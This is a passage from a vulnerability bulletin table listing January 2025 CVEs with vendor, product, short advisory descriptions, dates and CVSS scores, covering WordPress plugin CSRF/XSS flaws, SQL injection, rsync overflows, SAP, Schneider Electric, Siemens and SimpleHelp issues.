An issue in the sqlg_vec_upd component of openlink virtuoso-opensource v7.2.11 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements. | 2025-01-14 | 7.5 | CVE-2024-57657 |
| n/a--n/a |
An issue in the sql_tree_hash_1 component of openlink virtuoso-opensource v7.2.11 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements. | 2025-01-14 | 7.5 | CVE-2024-57658 |
| n/a--n/a |
An issue in the sqlg_parallel_ts_seq component of openlink virtuoso-opensource v7.2.11 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements. | 2025-01-14 | 7.5 | CVE-2024-57659 |
| n/a--n/a |
An issue in the sqlo_expand_jts component of openlink virtuoso-opensource v7.2.11 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements. | 2025-01-14 | 7.5 | CVE-2024-57660 |
| n/a--n/a |
An issue in the sqlo_df component of openlink virtuoso-opensource v7.2.11 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements. | 2025-01-14 | 7.5 | CVE-2024-57661 |
| n/a--ZZCMS |
A vulnerability was found in ZZCMS 2023. It has been rated as critical. Affected by this issue is some unknown functionality of the file /index.php. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. | 2025-01-19 | 7.3 | CVE-2025-0565 |
| Nazmul Ahsan--MDC YouTube Downloader |
Cross-Site Request Forgery (CSRF) vulnerability in Nazmul Ahsan MDC YouTube Downloader allows Stored XSS.This issue affects MDC YouTube Downloader: from n/a through 3.0.0. | 2025-01-16 | 7.1 | CVE-2025-23639 |
| Nazmul Ahsan--Rename Author Slug |
Cross-Site Request Forgery (CSRF) vulnerability in Nazmul Ahsan Rename Author Slug allows Stored XSS.This issue affects Rename Author Slug: from n/a through 1.2.0. | 2025-01-16 | 7.1 | CVE-2025-23640 |
| NEC Corporation--WG2600HS |
Cross-site scripting vulnerability in NEC Corporation Aterm WG2600HS Ver.1.7.2 and earlier, WG2600HP4 Ver.1.4.2 and earlier, WG2600HM4 Ver.1.4.2 and earlier, WG2600HS2 Ver.1.3.2 and earlier, WX3000HP Ver.2.4.2 and earlier and WX4200D5 Ver.1.2.4 and earlier allows a attacker to inject an arbitrary script via the network. | 2025-01-15 | 7.2 | CVE-2025-0354 |
| NEC Corporation--WG2600HS |
Missing Authentication for Critical Function vulnerability in NEC Corporation Aterm WG2600HS Ver.1.7.2 and earlier, WF1200CRS Ver.1.6.0 and earlier, WG1200CRS Ver.1.5.0 and earlier, GB1200PE Ver.1.3.0 and earlier, WG2600HP4 Ver.1.4.2 and earlier, WG2600HM4 Ver.1.4.2 and earlier, WG2600HS2 Ver.1.3.2 and earlier, WX3000HP Ver.2.4.2 and earlier and WX4200D5 Ver.1.2.4 and earlier allows a attacker to get a Wi-Fi password via the network. | 2025-01-15 | 7.5 | CVE-2025-0355 |
| Nedap Librix--Ecoreader |
Nedap Librix Ecoreader is missing authentication for critical functions that could allow an unauthenticated attacker to potentially execute malicious code. | 2025-01-17 | 8.6 | CVE-2024-12757 |
| neran--Social proof testimonials and reviews by Repuso |
The Social proof testimonials and reviews by Repuso plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'rw_image_badge1' shortcode in all versions up to, and including, 5.20 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-01-15 | 7.2 | CVE-2024-13351 |
| NetVision Information--airPASS |
The airPASS from NetVision Information has a SQL Injection vulnerability, allowing unauthenticated remote attackers to inject arbitrary SQL commands to read, modify, and delete database contents. | 2025-01-16 | 9.8 | CVE-2025-0455 |
| NetVision Information--airPASS |
The airPASS from NetVision Information has a Missing Authentication vulnerability, allowing unauthenticated remote attackers to access the specific administrative functionality to retrieve * all accounts and passwords. | 2025-01-16 | 9.8 | CVE-2025-0456 |
| NetVision Information--airPASS |
The airPASS from NetVision Information has an OS Command Injection vulnerability, allowing remote attackers with regular privileges to inject and execute arbitrary OS commands. | 2025-01-16 | 8.8 | CVE-2025-0457 |
| New Normal LLC--LucidLMS |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in New Normal LLC LucidLMS allows Reflected XSS.This issue affects LucidLMS: from n/a through 1.0.5. | 2025-01-13 | 7.1 | CVE-2025-22498 |
| Niklas Olsson--Universal Analytics Injector |
Cross-Site Request Forgery (CSRF) vulnerability in Niklas Olsson Universal Analytics Injector allows Stored XSS.This issue affects Universal Analytics Injector: from n/a through 1.0.3. | 2025-01-16 | 7.1 | CVE-2025-23483 |
| Nilesh Shiragave--WordPress Gallery Plugin |
Cross-Site Request Forgery (CSRF) vulnerability in Nilesh Shiragave WordPress Gallery Plugin allows Cross Site Request Forgery.This issue affects WordPress Gallery Plugin: from n/a through 1.4. | 2025-01-16 | 7.1 | CVE-2025-23842 |
| nitropack--NitroPack Caching & Speed Optimization for Core Web Vitals, Defer CSS & JS, Lazy load Images and CDN |
The NitroPack plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'nitropack_dismiss_notice_forever' AJAX action in all versions up to, and including, 1.17.0. This makes it possible for authenticated attackers, with subscriber-level access and above, to update arbitrary options to a fixed value of '1' which can activate certain options (e.g., enable user registration) or modify certain options in a way that leads to a denial of service condition. | 2025-01-15 | 8.1 | CVE-2024-11848 |
| Observium--Observium |
A cross-site scripting (xss) vulnerability exists in the weather map editor functionality of Observium CE 24.4.13528. A specially crafted HTTP request can lead to a arbitrary javascript code execution. An authenticated user would need to click a malicious link provided by the attacker. | 2025-01-15 | 8.7 | CVE-2024-45061 |
| Observium--Observium |
A html code injection vulnerability exists in the vlan management part of Observium CE 24.4.13528. A specially crafted HTTP request can lead to an arbitrary html code. An authenticated user would need to click a malicious link provided by the attacker. | 2025-01-15 | 8.7 | CVE-2024-47002 |
| Observium--Observium |
A cross-site scripting (xss) vulnerability exists in the add_alert_check page of Observium CE 24.4.13528. A specially crafted HTTP request can lead to a arbitrary javascript code execution. An authenticated user would need to click a malicious link provided by the attacker. | 2025-01-15 | 8.7 | CVE-2024-47140 |
| OFFIS--DCMTK |
An improper array index validation vulnerability exists in the nowindow functionality of OFFIS DCMTK 3.6.8. A specially crafted DICOM file can lead to an out-of-bounds write. An attacker can provide a malicious file to trigger this vulnerability. | 2025-01-13 | 8.4 | CVE-2024-47796 |
| OFFIS--DCMTK |
An improper array index validation vulnerability exists in the determineMinMax functionality of OFFIS DCMTK 3.6.8. A specially crafted DICOM file can lead to an out-of-bounds write. An attacker can provide a malicious file to trigger this vulnerability. | 2025-01-13 | 8.4 | CVE-2024-52333 |
| Oliver Schaal--Floatbox Plus |
Cross-Site Request Forgery (CSRF) vulnerability in Oliver Schaal Floatbox Plus allows Stored XSS.This issue affects Floatbox Plus: from n/a through 1.4.4. | 2025-01-16 | 7.1 | CVE-2025-23617 |
| Oliver Schaal--GravatarLocalCache |
Cross-Site Request Forgery (CSRF) vulnerability in Oliver Schaal GravatarLocalCache allows Cross Site Request Forgery.This issue affects GravatarLocalCache: from n/a through 1.1.2. | 2025-01-16 | 7.1 | CVE-2025-23901 |
| openobserve--openobserve |
OpenObserve is a cloud-native observability platform. A vulnerability in the user management endpoint `/api/{org_id}/users/{email_id}` allows an "Admin" role user to remove a "Root" user from the organization. This violates the intended privilege hierarchy, enabling a non-root user to remove the highest-privileged account. Due to insufficient role checks, the `remove_user_from_org` function does not prevent an "Admin" user from removing a "Root" user. As a result, an attacker with an "Admin" role can remove critical "Root" users, potentially gaining effective full control by eliminating the highest-privileged accounts. The `DELETE /api/{org_id}/users/{email_id}` endpoint is affected. This issue has been addressed in release version `0.14.1` and all users are advised to upgrade. There are no known workarounds for this vulnerability. | 2025-01-16 | 8.7 | CVE-2024-55954 |
| Oren hahiashvili--add custom google tag manager |
Cross-Site Request Forgery (CSRF) vulnerability in Oren hahiashvili add custom google tag manager allows Stored XSS.This issue affects add custom google tag manager: from n/a through 1.0.3. | 2025-01-16 | 7.1 | CVE-2025-23537 |
| Oren Yomtov--Mass Custom Fields Manager |
Cross-Site Request Forgery (CSRF) vulnerability in Oren Yomtov Mass Custom Fields Manager allows Reflected XSS.This issue affects Mass Custom Fields Manager: from n/a through 1.5. | 2025-01-16 | 7.1 | CVE-2025-23430 |
| OriginalTips.com--WordPress Data Guard |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in OriginalTips.com WordPress Data Guard allows Stored XSS.This issue affects WordPress Data Guard: from n/a through 8. | 2025-01-16 | 7.1 | CVE-2025-23828 |
| pankajpragma, rahulpragma--WordPress Google Map Professional |
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in pankajpragma, rahulpragma WordPress Google Map Professional allows SQL Injection.This issue affects WordPress Google Map Professional: from n/a through 1.0. | 2025-01-16 | 8.5 | CVE-2025-23913 |
| Paramveer Singh for Arete IT Private Limited--Post And Page Reactions |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Paramveer Singh for Arete IT Private Limited Post And Page Reactions allows Reflected XSS.This issue affects Post And Page Reactions: from n/a through 1.0.5. | 2025-01-13 | 7.1 | CVE-2025-22568 |
| Pascal Casier--Board Election |
Cross-Site Request Forgery (CSRF) vulnerability in Pascal Casier Board Election allows Stored XSS.This issue affects Board Election: from n/a through 1.0.1. | 2025-01-16 | 7.1 | CVE-2025-23499 |
| PayForm--PayForm |
Cross-Site Request Forgery (CSRF) vulnerability in PayForm PayForm allows Stored XSS.This issue affects PayForm: from n/a through 2.0. | 2025-01-16 | 7.1 | CVE-2025-23872 |
| Peggy Kuo--More Link Modifier |
Cross-Site Request Forgery (CSRF) vulnerability in Peggy Kuo More Link Modifier allows Stored XSS.This issue affects More Link Modifier: from n/a through 1.0.3. | 2025-01-16 | 7.1 | CVE-2025-23818 |
| Peter Shaw--LH Login Page |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Peter Shaw LH Login Page allows Reflected XSS.This issue affects LH Login Page: from n/a through 2.14. | 2025-01-16 | 7.1 | CVE-2025-23547 |
| PHOENIX CONTACT--CHARX SEC-3000 |
An authenticated attacker can use this vulnerability to perform a privilege escalation to gain root access. | 2025-01-14 | 8.8 | CVE-2024-11497 |
| pickplugins--Post Grid and Gutenberg Blocks ComboBlocks |
The Post Grid and Gutenberg Blocks plugin for WordPress is vulnerable to privilege escalation in versions 2.2.85 to 2.3.3. This is due to the plugin not properly restricting what user meta can be updated during profile registration. This makes it possible for unauthenticated attackers to register on the site as an administrator. | 2025-01-15 | 9.8 | CVE-2024-9636 |
| PMB Services--PMB platform |
Unrestricted file upload vulnerability in the PMB platform, affecting versions 4.0.10 and above. This vulnerability could allow an attacker to upload a file to gain remote access to the machine, being able to access, modify and execute commands freely. | 2025-01-16 | 9.9 | CVE-2025-0471 |
| PMB Services--PMB platform |
Information exposure in the PMB platform affecting versions 4.2.13 and earlier. This vulnerability allows an attacker to upload a file to the environment and enumerate the internal files of a machine by looking at the request response. | 2025-01-16 | 7.5 | CVE-2025-0472 |
| Poco--Blogger Image Import |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Poco Blogger Image Import allows Stored XSS.This issue affects Blogger Image Import: from 2.1 through n/a. | 2025-01-16 | 7.1 | CVE-2025-23689 |
| Predrag Supurovi--Stop Comment Spam |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Predrag Supurović Stop Comment Spam allows Stored XSS.This issue affects Stop Comment Spam: from n/a through 0.5.3. | 2025-01-16 | 7.1 | CVE-2025-23826 |
| project-zot--zot |
zot is a production-ready vendor-neutral OCI image registry. The group data stored for users in the boltdb database (meta.db) is an append-list so group revocations/removals are ignored in the API. SetUserGroups is alled on login, but instead of replacing the group memberships, they are appended. This may be due to some conflict with the group definitions in the config file, but that wasn't obvious to me if it were the case. Any Zot configuration that relies on group-based authorization will not respect group remove/revocation by an IdP. This issue has been addressed in version 2.1.2. All users are advised to upgrade. There are no known workarounds for this vulnerability. | 2025-01-17 | 7.3 | CVE-2025-23208 |
| Rapid Sort--RSV GMaps |
Cross-Site Request Forgery (CSRF) vulnerability in Rapid Sort RSV GMaps allows Stored XSS.This issue affects RSV GMaps: from n/a through 1.5. | 2025-01-16 | 7.1 | CVE-2025-23665 |
| RasaHQ--rasa-pro-security-advisories |
Open source machine learning framework. A vulnerability has been identified in Rasa that enables an attacker who has the ability to load a maliciously crafted model remotely into a Rasa instance to achieve Remote Code Execution. The prerequisites for this are: 1. The HTTP API must be enabled on the Rasa instance eg with `--enable-api`. This is not the default configuration. 2. For unauthenticated RCE to be exploitable, the user must not have configured any authentication or other security controls recommended in our documentation. 3. For authenticated RCE, the attacker must posses a valid authentication token or JWT to interact with the Rasa API. This issue has been addressed in rasa version 3.6.21 and all users are advised to upgrade. Users unable to upgrade should ensure that they require authentication and that only trusted users are given access. | 2025-01-14 | 9 | CVE-2024-49375 |
| RaymondDesign--Post & Page Notes |
Cross-Site Request Forgery (CSRF) vulnerability in RaymondDesign Post & Page Notes allows Stored XSS.This issue affects Post & Page Notes: from n/a through 0.1.1. | 2025-01-16 | 7.1 | CVE-2025-23715 |
| Real Seguro Viagem--Real Seguro Viagem |
Cross-Site Request Forgery (CSRF) vulnerability in Real Seguro Viagem Real Seguro Viagem allows Stored XSS.This issue affects Real Seguro Viagem: from n/a through 2.0.5. | 2025-01-16 | 7.1 | CVE-2025-23664 |
| Red Hat--Red Hat Enterprise Linux 7 |
A heap-based buffer overflow flaw was found in the rsync daemon. This issue is due to improper handling of attacker-controlled checksum lengths (s2length) in the code. When MAX_DIGEST_LEN exceeds the fixed SUM_LENGTH (16 bytes), an attacker can write out of bounds in the sum2 buffer. | 2025-01-15 | 9.8 | CVE-2024-12084 |
| Red Hat--Red Hat Enterprise Linux 8 |
A flaw was found in the rsync daemon which could be triggered when rsync compares file checksums. This flaw allows an attacker to manipulate the checksum length (s2length) to cause a comparison between a checksum and uninitialized memory and leak one byte of uninitialized stack data at a time. | 2025-01-14 | 7.5 | CVE-2024-12085 |
| Regios--MyAnime Widget |
Cross-Site Request Forgery (CSRF) vulnerability in Regios MyAnime Widget allows Privilege Escalation.This issue affects MyAnime Widget: from n/a through 1.0. | 2025-01-16 | 8.8 | CVE-2025-23532 |
| Robert Nicholson--Copyright Safeguard Footer Notice |
Cross-Site Request Forgery (CSRF) vulnerability in Robert Nicholson Copyright Safeguard Footer Notice allows Stored XSS.This issue affects Copyright Safeguard Footer Notice: from n/a through 3.0. | 2025-01-16 | 7.1 | CVE-2025-23870 |
| Roninwp--FAT Event Lite |
Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Roninwp FAT Event Lite allows PHP Local File Inclusion.This issue affects FAT Event Lite: from n/a through 1.1. | 2025-01-16 | 7.5 | CVE-2025-23915 |
| Ryan Sutana--NV Slider |
Cross-Site Request Forgery (CSRF) vulnerability in Ryan Sutana NV Slider allows Stored XSS.This issue affects NV Slider: from n/a through 1.6. | 2025-01-16 | 7.1 | CVE-2025-23661 |
| Ryan Sutana--WP Panoramio |
Cross-Site Request Forgery (CSRF) vulnerability in Ryan Sutana WP Panoramio allows Stored XSS.This issue affects WP Panoramio: from n/a through 1.5.0. | 2025-01-16 | 7.1 | CVE-2025-23662 |
| saadiqbal--Advanced File Manager Ultimate WordPress File Manager and Document Library Plugin |
The Advanced File Manager plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'fma_local_file_system' function in versions 5.2.12 to 5.2.13. This makes it possible for authenticated attackers, with Subscriber-level access and above and upload permissions granted by an administrator, to upload arbitrary files on the affected site's server which may make remote code execution possible. The function can be exploited only if the "Display .htaccess?" setting is enabled. | 2025-01-17 | 7.5 | CVE-2024-13333 |
| Saleswonder.biz Team--WP2LEADS |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Saleswonder.biz Team WP2LEADS allows Reflected XSS.This issue affects WP2LEADS: from n/a through 3.4.2. | 2025-01-13 | 7.1 | CVE-2024-56065 |
| Sam Burdge--WP Background Tile |
Cross-Site Request Forgery (CSRF) vulnerability in Sam Burdge WP Background Tile allows Stored XSS.This issue affects WP Background Tile: from n/a through 1.0. | 2025-01-16 | 7.1 | CVE-2025-23573 |
| SandyIN--Import Users to MailChimp |
Cross-Site Request Forgery (CSRF) vulnerability in SandyIN Import Users to MailChimp allows Stored XSS.This issue affects Import Users to MailChimp: from n/a through 1.0. | 2025-01-16 | 7.1 | CVE-2025-23675 |
| SAP_SE--SAP BusinessObjects Business Intelligence Platform |
SAP BusinessObjects Business Intelligence Platform allows an unauthenticated attacker to perform session hijacking over the network without any user interaction, due to an information disclosure vulnerability. Attacker can access and modify all the data of the application. | 2025-01-14 | 8.7 | CVE-2025-0061 |
| SAP_SE--SAP NetWeaver Application Server for ABAP and ABAP Platform |
SAP NetWeaver Application Server for ABAP and ABAP Platform allows an authenticated attacker to obtain illegitimate access to the system by exploiting improper authentication checks, resulting in privilege escalation. On successful exploitation, this can result in potential security concerns. This results in a high impact on confidentiality, integrity, and availability. | 2025-01-14 | 9.9 | CVE-2025-0070 |
| SAP_SE--SAP NetWeaver AS ABAP and ABAP Platform |
SAP NetWeaver AS ABAP and ABAP Platform does not check for authorization when a user executes some RFC function modules. This could lead to an attacker with basic user privileges to gain control over the data in Informix database, leading to complete compromise of confidentiality, integrity and availability. | 2025-01-14 | 8.8 | CVE-2025-0063 |
| SAP_SE--SAP NetWeaver AS for ABAP and ABAP Platform (Internet Communication Framework) |
Under certain conditions SAP NetWeaver AS for ABAP and ABAP Platform (Internet Communication Framework) allows an attacker to access restricted information due to weak access controls. This can have a significant impact on the confidentiality, integrity, and availability of an application | 2025-01-14 | 9.9 | CVE-2025-0066 |
| SAP_SE--SAPSetup |
Due to DLL injection vulnerability in SAPSetup, an attacker with either local user privileges or with access to a compromised corporate user�s Windows account could gain higher privileges. With this, he could move laterally within the network and further compromise the active directory of a company. This leads to high impact on confidentiality, integrity and availability of the Windows server. | 2025-01-14 | 7.8 | CVE-2025-0069 |
| Scanventory.net--Scanventory |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Scanventory.net Scanventory allows Reflected XSS.This issue affects Scanventory: from n/a through 1.1.3. | 2025-01-13 | 7.1 | CVE-2025-22588 |
| Schalk Burger--Anonymize Links |
Cross-Site Request Forgery (CSRF) vulnerability in Schalk Burger Anonymize Links allows Stored XSS.This issue affects Anonymize Links: from n/a through 1.1. | 2025-01-16 | 7.1 | CVE-2025-23702 |
| Schneider Electric--Modicon M340 processors (part numbers BMXP34*) |
CWE-200: Exposure of Sensitive Information to an Unauthorized Actor vulnerability exists that could cause information disclosure of restricted web page, modification of web page and denial of service when specific web pages are modified and restricted functions are invoked. | 2025-01-17 | 8.6 | CVE-2024-12142 |
| Schneider Electric--Modicon M580 CPU (part numbers BMEP* and BMEH*, excluding M580 CPU Safety) |
CWE-131: Incorrect Calculation of Buffer Size vulnerability exists that could cause Denial-of-Service of the product when an unauthenticated user is sending a crafted HTTPS packet to the webserver. | 2025-01-17 | 7.5 | CVE-2024-11425 |
| Schneider Electric--PowerLogic HDPM6000 |
CWE-639: Authorization Bypass Through User-Controlled Key vulnerability exists that could allow an authorized attacker to modify values outside those defined by their privileges (Elevation of Privileges) when the attacker sends modified HTTPS requests to the device. | 2025-01-17 | 8.8 | CVE-2024-10497 |
| Schneider Electric--Pro-face GP-Pro EX |
CWE-924: Improper Enforcement of Message Integrity During Transmission in a Communication Channel vulnerability exists that could cause partial loss of confidentiality, loss of integrity and availability of the HMI when attacker performs man in the middle attack by intercepting the communication. | 2025-01-17 | 7.1 | CVE-2024-12399 |
| Schneider Electric--RemoteConnect and SCADAPack x70 Utilities |
CWE-502: Deserialization of untrusted data vulnerability exists that could lead to loss of confidentiality, integrity and potential remote code execution on workstation when a non-admin authenticated user opens a malicious project file. | 2025-01-17 | 7.8 | CVE-2024-12703 |
| Schneider Electric--Web Designer for BMXNOR0200H |
CWE-611: Improper Restriction of XML External Entity Reference vulnerability exists that could cause information disclosure, impacts workstation integrity and potential remote code execution on the compromised computer, when specific crafted XML file is imported in the Web Designer configuration tool. | 2025-01-17 | 7.8 | CVE-2024-12476 |
| Scott Swezey--Easy Tynt |
Cross-Site Request Forgery (CSRF) vulnerability in Scott Swezey Easy Tynt allows Cross Site Request Forgery.This issue affects Easy Tynt: from n/a through 0.2.5.1. | 2025-01-16 | 7.1 | CVE-2025-23445 |
| SEOReseller Team--SEOReseller Partner |
Cross-Site Request Forgery (CSRF) vulnerability in SEOReseller Team SEOReseller Partner allows Cross Site Request Forgery.This issue affects SEOReseller Partner: from n/a through 1.3.15. | 2025-01-16 | 7.1 | CVE-2025-23805 |
| Shabbos Commerce--Shabbos and Yom Tov |
Cross-Site Request Forgery (CSRF) vulnerability in Shabbos Commerce Shabbos and Yom Tov allows Stored XSS.This issue affects Shabbos and Yom Tov: from n/a through 1.9. | 2025-01-16 | 7.1 | CVE-2025-23694 |
| Shibu Lijack a.k.a CyberJack--CJ Custom Content |
Cross-Site Request Forgery (CSRF) vulnerability in Shibu Lijack a.k.a CyberJack CJ Custom Content allows Stored XSS.This issue affects CJ Custom Content: from n/a through 2.0. | 2025-01-16 | 7.1 | CVE-2025-23869 |
| Shiv Prakash Tiwari--WP Service Payment Form With Authorize.net |
Cross-Site Request Forgery (CSRF) vulnerability in Shiv Prakash Tiwari WP Service Payment Form With Authorize.net allows Reflected XSS.This issue affects WP Service Payment Form With Authorize.net: from n/a through 2.6.0. | 2025-01-16 | 7.1 | CVE-2025-23804 |
| Siemens--Mendix LDAP |
A vulnerability has been identified in Mendix LDAP (All versions < V1.1.2). Affected versions of the module are vulnerable to LDAP injection. This could allow an unauthenticated remote attacker to bypass username verification. | 2025-01-14 | 7.4 | CVE-2024-56841 |
| Siemens--SIMATIC S7-1200 CPU 1211C AC/DC/Rly |
A vulnerability has been identified in SIMATIC S7-1200 CPU 1211C AC/DC/Rly (6ES7211-1BE40-0XB0), SIMATIC S7-1200 CPU 1211C DC/DC/DC (6ES7211-1AE40-0XB0), SIMATIC S7-1200 CPU 1211C DC/DC/Rly (6ES7211-1HE40-0XB0), SIMATIC S7-1200 CPU 1212C AC/DC/Rly (6ES7212-1BE40-0XB0), SIMATIC S7-1200 CPU 1212C DC/DC/DC (6ES7212-1AE40-0XB0), SIMATIC S7-1200 CPU 1212C DC/DC/Rly (6ES7212-1HE40-0XB0), SIMATIC S7-1200 CPU 1212FC DC/DC/DC (6ES7212-1AF40-0XB0), SIMATIC S7-1200 CPU 1212FC DC/DC/Rly (6ES7212-1HF40-0XB0), SIMATIC S7-1200 CPU 1214C AC/DC/Rly (6ES7214-1BG40-0XB0), SIMATIC S7-1200 CPU 1214C DC/DC/DC (6ES7214-1AG40-0XB0), SIMATIC S7-1200 CPU 1214C DC/DC/Rly (6ES7214-1HG40-0XB0), SIMATIC S7-1200 CPU 1214FC DC/DC/DC (6ES7214-1AF40-0XB0), SIMATIC S7-1200 CPU 1214FC DC/DC/Rly (6ES7214-1HF40-0XB0), SIMATIC S7-1200 CPU 1215C AC/DC/Rly (6ES7215-1BG40-0XB0), SIMATIC S7-1200 CPU 1215C DC/DC/DC (6ES7215-1AG40-0XB0), SIMATIC S7-1200 CPU 1215C DC/DC/Rly (6ES7215-1HG40-0XB0), SIMATIC S7-1200 CPU 1215FC DC/DC/DC (6ES7215-1AF40-0XB0), SIMATIC S7-1200 CPU 1215FC DC/DC/Rly (6ES7215-1HF40-0XB0), SIMATIC S7-1200 CPU 1217C DC/DC/DC (6ES7217-1AG40-0XB0), SIPLUS S7-1200 CPU 1212 AC/DC/RLY (6AG1212-1BE40-2XB0), SIPLUS S7-1200 CPU 1212 AC/DC/RLY (6AG1212-1BE40-4XB0), SIPLUS S7-1200 CPU 1212 DC/DC/RLY (6AG1212-1HE40-2XB0), SIPLUS S7-1200 CPU 1212 DC/DC/RLY (6AG1212-1HE40-4XB0), SIPLUS S7-1200 CPU 1212C DC/DC/DC (6AG1212-1AE40-2XB0), SIPLUS S7-1200 CPU 1212C DC/DC/DC (6AG1212-1AE40-4XB0), SIPLUS S7-1200 CPU 1212C DC/DC/DC RAIL (6AG2212-1AE40-1XB0), SIPLUS S7-1200 CPU 1214 AC/DC/RLY (6AG1214-1BG40-2XB0), SIPLUS S7-1200 CPU 1214 AC/DC/RLY (6AG1214-1BG40-4XB0), SIPLUS S7-1200 CPU 1214 AC/DC/RLY (6AG1214-1BG40-5XB0), SIPLUS S7-1200 CPU 1214 DC/DC/DC (6AG1214-1AG40-2XB0), SIPLUS S7-1200 CPU 1214 DC/DC/DC (6AG1214-1AG40-4XB0), SIPLUS S7-1200 CPU 1214 DC/DC/DC (6AG1214-1AG40-5XB0), SIPLUS S7-1200 CPU 1214 DC/DC/RLY (6AG1214-1HG40-2XB0), SIPLUS S7-1200 CPU 1214 DC/DC/RLY (6AG1214-1HG40-4XB0), SIPLUS S7-1200 CPU 1214 DC/DC/RLY (6AG1214-1HG40-5XB0), SIPLUS S7-1200 CPU 1214C DC/DC/DC RAIL (6AG2214-1AG40-1XB0), SIPLUS S7-1200 CPU 1214FC DC/DC/DC (6AG1214-1AF40-5XB0), SIPLUS S7-1200 CPU 1214FC DC/DC/RLY (6AG1214-1HF40-5XB0), SIPLUS S7-1200 CPU 1215 AC/DC/RLY (6AG1215-1BG40-2XB0), SIPLUS S7-1200 CPU 1215 AC/DC/RLY (6AG1215-1BG40-4XB0), SIPLUS S7-1200 CPU 1215 AC/DC/RLY (6AG1215-1BG40-5XB0), SIPLUS S7-1200 CPU 1215 DC/DC/DC (6AG1215-1AG40-2XB0), SIPLUS S7-1200 CPU 1215 DC/DC/DC (6AG1215-1AG40-4XB0), SIPLUS S7-1200 CPU 1215 DC/DC/RLY (6AG1215-1HG40-2XB0), SIPLUS S7-1200 CPU 1215 DC/DC/RLY (6AG1215-1HG40-4XB0), SIPLUS S7-1200 CPU 1215 DC/DC/RLY (6AG1215-1HG40-5XB0), SIPLUS S7-1200 CPU 1215C DC/DC/DC (6AG1215-1AG40-5XB0), SIPLUS S7-1200 CPU 1215FC DC/DC/DC (6AG1215-1AF40-5XB0). The web interface of the affected devices is vulnerable to Cross-Site Request Forgery (CSRF) attacks. This could allow an unauthenticated attacker to change the CPU mode by tricking a legitimate and authenticated user with sufficient permissions on the target CPU to click on a malicious link. | 2025-01-14 | 7.1 | CVE-2024-47100 |
| simple-help -- simplehelp |
SimpleHelp remote support software v5.5.7 and before has a vulnerability that allows low-privileges technicians to create API keys with excessive permissions. These API keys can be used to escalate privileges to the server admin role. | 2025-01-15 | 8.8 | CVE-2024-57726 |
| simple-help -- simplehelp |
SimpleHelp remote support software v5.5.7 and before is vulnerable to multiple path traversal vulnerabilities that enable unauthenticated remote attackers to download arbitrary files from the SimpleHelp host via crafted HTTP requests. These files include server configuration files containing various secrets and hashed user passwords. | 2025-01-15 | 7.5 | CVE-2024-57727 |
| simple-help -- simplehelp |
SimpleHelp remote support software v5.5.7 and before allows admin users to upload arbitrary files anywhere on the file system by uploading a crafted zip file (i.e. zip slip). This can be exploited to execute arbitrary code on the host in the context of the SimpleHelp server user. | 2025-01-15 | 7.2 | CVE-2024-57728 |
| Sismics--Teedy |
Teedy through 1.11 allows CSRF for account takeover via POST /api/user/admin. | 2025-01-13 | 7.5 | CVE-2025-22963 |
| SmartAgenda--Smart Agenda |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in SmartAgenda Smart Agenda allows Stored XSS.This issue affects Smart Agenda: from n/a through 4.7. | 2025-01-13 | 7.1 | CVE-2025-22506 |
| Solidres Team--Solidres Hotel booking plugin |
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Solidres Team Solidres - Hotel booking plugin allows SQL Injection.This issue affects Solidres - Hotel booking plugin: from n/a through 0.9.4. | 2025-01-16 | 8.5 | CVE-2025-23911 |
| Somethinkodd.com Development Team--EmailShroud |
Cross-Site Request Forgery (CSRF) vulnerability in Somethinkodd.com Development Team EmailShroud allows Reflected XSS.This issue affects EmailShroud: from n/a through 2.2.1. | 2025-01-16 | 7.1 | CVE-2025-23456 |
| Sourov Amin--Word Freshener |
Cross-Site Request Forgery (CSRF) vulnerability in Sourov Amin Word Freshener allows Stored XSS.This issue affects Word Freshener: from n/a through 1.3. | 2025-01-16 | 7.1 | CVE-2025-23577 |
| spoonthemes--Adifier System |
The Adifier System plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 3.1.7. This is due to the plugin not properly validating a user's identity prior to updating their details like password through the adifier_recover() function. This makes it possible for unauthenticated attackers to change arbitrary user's passwords, including administrators, and leverage that to gain access to their account. | 2025-01-18 | 9.8 | CVE-2024-13375 |
| SpruceJoy--Cookie Consent & Autoblock for GDPR/CCPA |
Cross-Site Request Forgery (CSRF) vulnerability in SpruceJoy Cookie Consent & Autoblock for GDPR/CCPA allows Stored XSS.This issue affects Cookie Consent & Autoblock for GDPR/CCPA: from n/a through 1.0.1. | 2025-01-16 | 7.1 | CVE-2025-23501 |
| Stanisaw Skonieczny--Secure CAPTCHA |
Cross-Site Request Forgery (CSRF) vulnerability in Stanisław Skonieczny Secure CAPTCHA allows Stored XSS.This issue affects Secure CAPTCHA: from n/a through 1.2. | 2025-01-16 | 7.1 | CVE-2025-23693 |
| Stepan Stepasyuk--MemeOne |
Cross-Site Request Forgery (CSRF) vulnerability in Stepan Stepasyuk MemeOne allows Stored XSS.This issue affects MemeOne: from n/a through 2.0.5. | 2025-01-16 | 7.1 | CVE-2025-23559 |
| Strx--Strx Magic Floating Sidebar Maker |
